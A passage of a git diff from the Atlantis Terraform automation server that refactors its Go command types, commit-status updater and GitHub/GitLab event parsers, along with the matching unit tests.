+//	When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+//	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
+//	Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
+//}
+//
+//func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
+//	t.Log("if parsing the returned github pull request fails an error should be logged")
+//	setup(t)
+//	var pull github.PullRequest
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
+//
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+//	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
+//}
+//
+//func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
+//	t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
+//		" comment saying that this is not allowed")
+//	setup(t)
+//	ch.AllowForkPRs = false // by default it's false so don't need to reset
+//	var pull github.PullRequest
+//	modelPull := models.PullRequest{State: models.Open}
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+//
+//	headRepo := fixtures.GithubRepo
+//	headRepo.FullName = "forkrepo/atlantis"
+//	headRepo.Owner = "forkrepo"
+//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
+//
+//	ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
+//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
+//}
+//
+//func TestExecuteCommand_ClosedPull(t *testing.T) {
+//	t.Log("if a command is run on a closed pull request atlantis should" +
+//		" comment saying that this is not allowed")
+//	setup(t)
+//	pull := &github.PullRequest{
+//		State: github.String("closed"),
+//	}
+//	modelPull := models.PullRequest{State: models.Closed}
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+//	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
+//
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
+//}
+//
+//func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
+//	t.Log("if the workspace is locked, should comment back on the pull")
+//	setup(t)
+//	pull := &github.PullRequest{
+//		State: github.String("closed"),
+//	}
+//	cmd := events.CommentCommand{
+//		Name:      events.Plan,
+//		Workspace: "workspace",
+//	}
+//
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+//	When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
+//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
+//
+//	msg := "The workspace workspace is currently locked by another" +
+//		" command that is running for this pull request." +
+//		" Wait until the previous command is complete and try again."
+//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName())
+//	_, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+//	Equals(t, msg, result.Failure)
+//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
+//		"**Plan Failed**: "+msg+"\n\n")
+//}
+//
+//func TestExecuteCommand_FullRun(t *testing.T) {
+//	t.Log("when running a plan, apply should comment")
+//	pull := &github.PullRequest{
+//		State: github.String("closed"),
+//	}
+//	cmdResult := events.CommandResult{}
+//	for _, c := range []events.CommandName{events.Plan, events.Apply} {
+//		setup(t)
+//		cmd := events.CommentCommand{
+//			Name:      c,
+//			Workspace: "workspace",
+//		}
+//		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+//		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
+//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//		switch c {
+//		case events.Plan:
+//			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+//		case events.Apply:
+//			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+//		}
+//
+//		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
+//
+//		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+//		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+//		Equals(t, cmdResult, response)
+//		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//	}
+//}
+//
+//func TestExecuteCommand_ForkPREnabled(t *testing.T) {
+//	t.Log("when running a plan on a fork PR, it should succeed")
+//	setup(t)
+//
+//	// Enable forked PRs.
+//	ch.AllowForkPRs = true
+//	defer func() { ch.AllowForkPRs = false }() // Reset after test.
+//
+//	var pull github.PullRequest
+//	cmdResponse := events.CommandResult{}
+//	cmd := events.CommentCommand{
+//		Name:      events.Plan,
+//		Workspace: "workspace",
+//	}
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+//	headRepo := fixtures.GithubRepo
+//	headRepo.FullName = "forkrepo/atlantis"
+//	headRepo.Owner = "forkrepo"
+//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
+//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+//
+//	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
+//
+//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+//	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+//	Equals(t, cmdResponse, response)
+//	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//}
diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index 808d4493a9..c6f9f24395 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -59,7 +59,7 @@ type CommentParser struct {
 type CommentParseResult struct {
 	// Command is the successfully parsed command. Will be nil if
 	// CommentResponse or Ignore is set.
-	Command *Command
+	Command *CommentCommand
 	// CommentResponse is set when we should respond immediately to the command
 	// for example for atlantis help.
 	CommentResponse string
@@ -215,7 +215,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 	}
 
 	return CommentParseResult{
-		Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false),
+		Command: NewCommand(dir, extraArgs, name, verbose, workspace, project),
 	}
 }
 
diff --git a/server/events/commit_status_updater.go b/server/events/commit_status_updater.go
index 3debcd43fe..ba5a235036 100644
--- a/server/events/commit_status_updater.go
+++ b/server/events/commit_status_updater.go
@@ -27,10 +27,10 @@ import (
 // the status to signify whether the plan/apply succeeds.
 type CommitStatusUpdater interface {
 	// Update updates the status of the head commit of pull.
-	Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error
+	Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error
 	// UpdateProjectResult updates the status of the head commit given the
 	// state of response.
-	UpdateProjectResult(ctx *CommandContext, res CommandResponse) error
+	UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error
 }
 
 // DefaultCommitStatusUpdater implements CommitStatusUpdater.
@@ -39,13 +39,13 @@ type DefaultCommitStatusUpdater struct {
 }
 
 // Update updates the commit status.
-func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error {
-	description := fmt.Sprintf("%s %s", strings.Title(cmd.Name.String()), strings.Title(status.String()))
+func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error {
+	description := fmt.Sprintf("%s %s", strings.Title(command.String()), strings.Title(status.String()))
 	return d.Client.UpdateStatus(repo, pull, status, description)
 }
 
 // UpdateProjectResult updates the commit status based on the status of res.
-func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, res CommandResponse) error {
+func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error {
 	var status vcs.CommitStatus
 	if res.Error != nil || res.Failure != "" {
 		status = vcs.Failed
@@ -56,7 +56,7 @@ func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, re
 		}
 		status = d.worstStatus(statuses)
 	}
-	return d.Update(ctx.BaseRepo, ctx.Pull, status, ctx.Command)
+	return d.Update(ctx.BaseRepo, ctx.Pull, status, commandName)
 }
 
 func (d *DefaultCommitStatusUpdater) worstStatus(ss []vcs.CommitStatus) vcs.CommitStatus {
diff --git a/server/events/commit_status_updater_test.go b/server/events/commit_status_updater_test.go
index 7d05264b04..155822dc19 100644
--- a/server/events/commit_status_updater_test.go
+++ b/server/events/commit_status_updater_test.go
@@ -29,26 +29,12 @@ import (
 var repoModel = models.Repo{}
 var pullModel = models.PullRequest{}
 var status = vcs.Success
-var cmd = events.Command{
-	Name: events.Plan,
-}
-
-func TestStatus_String(t *testing.T) {
-	cases := map[vcs.CommitStatus]string{
-		vcs.Pending: "pending",
-		vcs.Success: "success",
-		vcs.Failed:  "failed",
-	}
-	for k, v := range cases {
-		Equals(t, v, k.String())
-	}
-}
 
 func TestUpdate(t *testing.T) {
 	RegisterMockTestingT(t)
 	client := mocks.NewMockClientProxy()
 	s := events.DefaultCommitStatusUpdater{Client: client}
-	err := s.Update(repoModel, pullModel, status, &cmd)
+	err := s.Update(repoModel, pullModel, status, events.Plan)
 	Ok(t, err)
 	client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, status, "Plan Success")
 }
@@ -58,11 +44,10 @@ func TestUpdateProjectResult_Error(t *testing.T) {
 	ctx := &events.CommandContext{
 		BaseRepo: repoModel,
 		Pull:     pullModel,
-		Command:  &events.Command{Name: events.Plan},
 	}
 	client := mocks.NewMockClientProxy()
 	s := events.DefaultCommitStatusUpdater{Client: client}
-	err := s.UpdateProjectResult(ctx, events.CommandResponse{Error: errors.New("err")})
+	err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Error: errors.New("err")})
 	Ok(t, err)
 	client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
 }
@@ -72,23 +57,20 @@ func TestUpdateProjectResult_Failure(t *testing.T) {
 	ctx := &events.CommandContext{
 		BaseRepo: repoModel,
 		Pull:     pullModel,
-		Command:  &events.Command{Name: events.Plan},
 	}
 	client := mocks.NewMockClientProxy()
 	s := events.DefaultCommitStatusUpdater{Client: client}
-	err := s.UpdateProjectResult(ctx, events.CommandResponse{Failure: "failure"})
+	err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Failure: "failure"})
 	Ok(t, err)
 	client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
 }
 
 func TestUpdateProjectResult(t *testing.T) {
-	t.Log("should use worst status")
 	RegisterMockTestingT(t)
 
 	ctx := &events.CommandContext{
 		BaseRepo: repoModel,
 		Pull:     pullModel,
-		Command:  &events.Command{Name: events.Plan},
 	}
 
 	cases := []struct {
@@ -126,25 +108,31 @@ func TestUpdateProjectResult(t *testing.T) {
 	}
 
 	for _, c := range cases {
-		var results []events.ProjectResult
-		for _, statusStr := range c.Statuses {
-			var result events.ProjectResult
-			switch statusStr {
-			case "failure":
-				result = events.ProjectResult{Failure: "failure"}
-			case "error":
-				result = events.ProjectResult{Error: errors.New("err")}
-			default:
-				result = events.ProjectResult{}
+		t.Run(strings.Join(c.Statuses, "-"), func(t *testing.T) {
+			var results []events.ProjectResult
+			for _, statusStr := range c.Statuses {
+				var result events.ProjectResult
+				switch statusStr {
+				case "failure":
+					result = events.ProjectResult{
+						ProjectCommandResult: events.ProjectCommandResult{Failure: "failure"},
+					}
+				case "error":
+					result = events.ProjectResult{
+						ProjectCommandResult: events.ProjectCommandResult{Error: errors.New("err")},
+					}
+				default:
+					result = events.ProjectResult{}
+				}
+				results = append(results, result)
 			}
-			results = append(results, result)
-		}
-		resp := events.CommandResponse{ProjectResults: results}
+			resp := events.CommandResult{ProjectResults: results}
 
-		client := mocks.NewMockClientProxy()
-		s := events.DefaultCommitStatusUpdater{Client: client}
-		err := s.UpdateProjectResult(ctx, resp)
-		Ok(t, err)
-		client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+			client := mocks.NewMockClientProxy()
+			s := events.DefaultCommitStatusUpdater{Client: client}
+			err := s.UpdateProjectResult(ctx, events.Plan, resp)
+			Ok(t, err)
+			client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+		})
 	}
 }
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index dbdccc8e50..3bf4e7f157 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -34,7 +34,27 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`)
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing
 
-type Command struct {
+type CommandInterface interface {
+	CommandName() CommandName
+	IsVerbose() bool
+	IsAutoplan() bool
+}
+
+type AutoplanCommand struct{}
+
+func (c AutoplanCommand) CommandName() CommandName {
+	return Plan
+}
+
+func (c AutoplanCommand) IsVerbose() bool {
+	return false
+}
+
+func (c AutoplanCommand) IsAutoplan() bool {
+	return true
+}
+
+type CommentCommand struct {
 	// Dir is the path relative to the repo root to run the command in.
 	// Will never be an empty string and will never end in "/".
 	Dir string
@@ -44,20 +64,29 @@ type Command struct {
 	Name      CommandName
 	Verbose   bool
 	Workspace string
-	// Autoplan is true if the command is a plan command being executed in an
-	// attempt to automatically run plan.
-	Autoplan bool
 	// ProjectName is the name of a project to run the command on. It refers to a
 	// project specified in an atlantis.yaml file.
 	ProjectName string
 }
 
-func (c Command) String() string {
-	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ","))
+func (c CommentCommand) CommandName() CommandName {
+	return c.Name
+}
+
+func (c CommentCommand) IsVerbose() bool {
+	return c.Verbose
+}
+
+func (c CommentCommand) IsAutoplan() bool {
+	return false
+}
+
+func (c CommentCommand) String() string {
+	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
 }
 
 // NewCommand constructs a Command, setting all missing fields to defaults.
-func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command {
+func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
 	// If dir was an empty string, this will return '.'.
 	validDir := path.Clean(dir)
 	if validDir == "/" {
@@ -66,24 +95,27 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work
 	if workspace == "" {
 		workspace = DefaultWorkspace
 	}
-	return &Command{
+	return &CommentCommand{
 		Dir:         validDir,
 		Flags:       flags,
 		Name:        name,
 		Verbose:     verbose,
 		Workspace:   workspace,
-		Autoplan:    autoplan,
 		ProjectName: project,
 	}
 }
 
 type EventParsing interface {
 	ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error)
-	// ParseGithubPull returns the pull request and head repo.
-	ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error)
+	// ParseGithubPull returns the pull request, base repo and head repo.
+	ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error)
+	// ParseGithubPullEvent returns the pull request, head repo and user that
+	// caused the event. Base repo is available as a field on PullRequest.
+	ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (pull models.PullRequest, baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
 	ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error)
-	// ParseGitlabMergeEvent returns the pull request, base repo and head repo.
-	ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error)
+	// ParseGitlabMergeEvent returns the pull request, base repo, head repo and
+	// user that caused the event.
+	ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error)
 	ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
 	ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest
 }
@@ -116,38 +148,58 @@ func (e *EventParser) ParseGithubIssueCommentEvent(comment *github.IssueCommentE
 	return
 }
 
-func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
-	var pullModel models.PullRequest
-	var headRepoModel models.Repo
+func (e *EventParser) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+	if pullEvent.PullRequest == nil {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("pull_request is null")
+	}
+	pull, baseRepo, headRepo, err := e.ParseGithubPull(pullEvent.PullRequest)
+	if err != nil {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+	}
+	if pullEvent.Sender == nil {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender is null")
+	}
+	senderUsername := pullEvent.Sender.GetLogin()
+	if senderUsername == "" {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender.login is null")
+	}
+	return pull, baseRepo, headRepo, models.User{Username: senderUsername}, nil
+}
 
+func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (pullModel models.PullRequest, baseRepo models.Repo, headRepo models.Repo, err error) {
 	commit := pull.Head.GetSHA()
 	if commit == "" {
-		return pullModel, headRepoModel, errors.New("head.sha is null")
+		err = errors.New("head.sha is null")
+		return
 	}
 	url := pull.GetHTMLURL()
 	if url == "" {
-		return pullModel, headRepoModel, errors.New("html_url is null")
+		err = errors.New("html_url is null")
+		return
 	}
 	branch := pull.Head.GetRef()
 	if branch == "" {
-		return pullModel, headRepoModel, errors.New("head.ref is null")
+		err = errors.New("head.ref is null")
+		return
 	}
 	authorUsername := pull.User.GetLogin()
 	if authorUsername == "" {
-		return pullModel, headRepoModel, errors.New("user.login is null")
+		err = errors.New("user.login is null")
+		return
 	}
 	num := pull.GetNumber()
 	if num == 0 {
-		return pullModel, headRepoModel, errors.New("number is null")
+		err = errors.New("number is null")
+		return
 	}
 
-	baseRepoModel, err := e.ParseGithubRepo(pull.Base.Repo)
+	baseRepo, err = e.ParseGithubRepo(pull.Base.Repo)
 	if err != nil {
-		return pullModel, headRepoModel, err
+		return
 	}
-	headRepoModel, err = e.ParseGithubRepo(pull.Head.Repo)
+	headRepo, err = e.ParseGithubRepo(pull.Head.Repo)
 	if err != nil {
-		return pullModel, headRepoModel, err
+		return
 	}
 
 	pullState := models.Closed
@@ -155,22 +207,23 @@ func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequ
 		pullState = models.Open
 	}
 
-	return models.PullRequest{
+	pullModel = models.PullRequest{
 		Author:     authorUsername,
 		Branch:     branch,
 		HeadCommit: commit,
 		URL:        url,
 		Num:        num,
 		State:      pullState,
-		BaseRepo:   baseRepoModel,
-	}, headRepoModel, nil
+		BaseRepo:   baseRepo,
+	}
+	return
 }
 
 func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
 	return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken)
 }
 
-func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) {
+func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
 	modelState := models.Closed
 	if event.ObjectAttributes.State == gitlabPullOpened {
 		modelState = models.Open
@@ -180,11 +233,11 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
 
 	baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
 	if err != nil {
-		return models.PullRequest{}, models.Repo{}, models.Repo{}, err
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
 	}
 	headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken)
 	if err != nil {
-		return models.PullRequest{}, models.Repo{}, models.Repo{}, err
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
 	}
 
 	pull := models.PullRequest{
@@ -197,7 +250,11 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
 		BaseRepo:   baseRepo,
 	}
 
-	return pull, baseRepo, headRepo, err
+	user := models.User{
+		Username: event.User.Username,
+	}
+
+	return pull, baseRepo, headRepo, user, err
 }
 
 // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event.
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index 1415ffba3f..d7ef7fce70 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -102,34 +102,91 @@ func TestParseGithubIssueCommentEvent(t *testing.T) {
 	Equals(t, *comment.Issue.Number, pullNum)
 }
 
+func TestParseGithubPullEvent(t *testing.T) {
+	_, _, _, _, err := parser.ParseGithubPullEvent(&github.PullRequestEvent{})
+	ErrEquals(t, "pull_request is null", err)
+
+	testEvent := deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+	testEvent.PullRequest.HTMLURL = nil
+	_, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+	ErrEquals(t, "html_url is null", err)
+
+	testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+	testEvent.Sender = nil
+	_, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+	ErrEquals(t, "sender is null", err)
+
+	testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+	testEvent.Sender.Login = nil
+	_, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+	ErrEquals(t, "sender.login is null", err)
+
+	actPull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGithubPullEvent(&PullEvent)
+	Ok(t, err)
+	expBaseRepo := models.Repo{
+		Owner:             "owner",
+		FullName:          "owner/repo",
+		CloneURL:          "https://github-user:github-token@github.com/owner/repo.git",
+		SanitizedCloneURL: Repo.GetCloneURL(),
+		Name:              "repo",
+		VCSHost: models.VCSHost{
+			Hostname: "github.com",
+			Type:     models.Github,
+		},
+	}
+	Equals(t, expBaseRepo, actBaseRepo)
+	Equals(t, expBaseRepo, actHeadRepo)
+	Equals(t, models.PullRequest{
+		URL:        Pull.GetHTMLURL(),
+		Author:     Pull.User.GetLogin(),
+		Branch:     Pull.Head.GetRef(),
+		HeadCommit: Pull.Head.GetSHA(),
+		Num:        Pull.GetNumber(),
+		State:      models.Open,
+		BaseRepo:   expBaseRepo,
+	}, actPull)
+	Equals(t, models.User{Username: "user"}, actUser)
+}
+
 func TestParseGithubPull(t *testing.T) {
 	testPull := deepcopy.Copy(Pull).(github.PullRequest)
 	testPull.Head.SHA = nil
-	_, _, err := parser.ParseGithubPull(&testPull)
+	_, _, _, err := parser.ParseGithubPull(&testPull)
 	ErrEquals(t, "head.sha is null", err)
 
 	testPull = deepcopy.Copy(Pull).(github.PullRequest)
 	testPull.HTMLURL = nil
-	_, _, err = parser.ParseGithubPull(&testPull)
+	_, _, _, err = parser.ParseGithubPull(&testPull)
 	ErrEquals(t, "html_url is null", err)
 
 	testPull = deepcopy.Copy(Pull).(github.PullRequest)
 	testPull.Head.Ref = nil
-	_, _, err = parser.ParseGithubPull(&testPull)
+	_, _, _, err = parser.ParseGithubPull(&testPull)
 	ErrEquals(t, "head.ref is null", err)
 
 	testPull = deepcopy.Copy(Pull).(github.PullRequest)
 	testPull.User.Login = nil
-	_, _, err = parser.ParseGithubPull(&testPull)
+	_, _, _, err = parser.ParseGithubPull(&testPull)
 	ErrEquals(t, "user.login is null", err)
 
 	testPull = deepcopy.Copy(Pull).(github.PullRequest)
 	testPull.Number = nil
-	_, _, err = parser.ParseGithubPull(&testPull)
+	_, _, _, err = parser.ParseGithubPull(&testPull)
 	ErrEquals(t, "number is null", err)
 
-	pullRes, _, err := parser.ParseGithubPull(&Pull)
+	pullRes, actBaseRepo, actHeadRepo, err := parser.ParseGithubPull(&Pull)
 	Ok(t, err)
+	expBaseRepo := models.Repo{
+		Owner:             "owner",
+		FullName:          "owner/repo",
+		CloneURL:          "https://github-user:github-token@github.com/owner/repo.git",
+		SanitizedCloneURL: Repo.GetCloneURL(),
+		Name:              "repo",
+		VCSHost: models.VCSHost{
+			Hostname: "github.com",
+			Type:     models.Github,
+		},
+	}
 	Equals(t, models.PullRequest{
 		URL:        Pull.GetHTMLURL(),
 		Author:     Pull.User.GetLogin(),
@@ -137,18 +194,10 @@ func TestParseGithubPull(t *testing.T) {
 		HeadCommit: Pull.Head.GetSHA(),
 		Num:        Pull.GetNumber(),
 		State:      models.Open,
-		BaseRepo: models.Repo{
-			Owner:             "owner",
-			FullName:          "owner/repo",
-			CloneURL:          "https://github-user:github-token@github.com/owner/repo.git",
-			SanitizedCloneURL: Repo.GetCloneURL(),
-			Name:              "repo",
-			VCSHost: models.VCSHost{
-				Hostname: "github.com",
-				Type:     models.Github,
-			},
-		},
+		BaseRepo:   expBaseRepo,
 	}, pullRes)
+	Equals(t, expBaseRepo, actBaseRepo)
+	Equals(t, expBaseRepo, actHeadRepo)
 }
 
 func TestParseGitlabMergeEvent(t *testing.T) {
@@ -156,10 +205,10 @@ func TestParseGitlabMergeEvent(t *testing.T) {
 	var event *gitlab.MergeEvent
 	err := json.Unmarshal([]byte(mergeEventJSON), &event)
 	Ok(t, err)
-	pull, repo, _, err := parser.ParseGitlabMergeEvent(*event)
+	pull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGitlabMergeEvent(*event)
 	Ok(t, err)
 
-	expRepo := models.Repo{
+	expBaseRepo := models.Repo{
 		FullName:          "gitlabhq/gitlab-test",
 		Name:              "gitlab-test",
 		SanitizedCloneURL: "https://example.com/gitlabhq/gitlab-test.git",
@@ -178,14 +227,26 @@ func TestParseGitlabMergeEvent(t *testing.T) {
 		HeadCommit: "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
 		Branch:     "ms-viewport",
 		State:      models.Open,
-		BaseRepo:   expRepo,
+		BaseRepo:   expBaseRepo,
 	}, pull)
 
-	Equals(t, expRepo, repo)
+	Equals(t, expBaseRepo, actBaseRepo)
+	Equals(t, models.Repo{
+		FullName:          "awesome_space/awesome_project",
+		Name:              "awesome_project",
+		SanitizedCloneURL: "http://example.com/awesome_space/awesome_project.git",
+		Owner:             "awesome_space",
+		CloneURL:          "http://gitlab-user:gitlab-token@example.com/awesome_space/awesome_project.git",
+		VCSHost: models.VCSHost{
+			Hostname: "example.com",
+			Type:     models.Gitlab,
+		},
+	}, actHeadRepo)
+	Equals(t, models.User{Username: "root"}, actUser)
 
 	t.Log("If the state is closed, should set field correctly.")
 	event.ObjectAttributes.State = "closed"
-	pull, _, _, err = parser.ParseGitlabMergeEvent(*event)
+	pull, _, _, _, err = parser.ParseGitlabMergeEvent(*event)
 	Ok(t, err)
 	Equals(t, models.Closed, pull.State)
 }
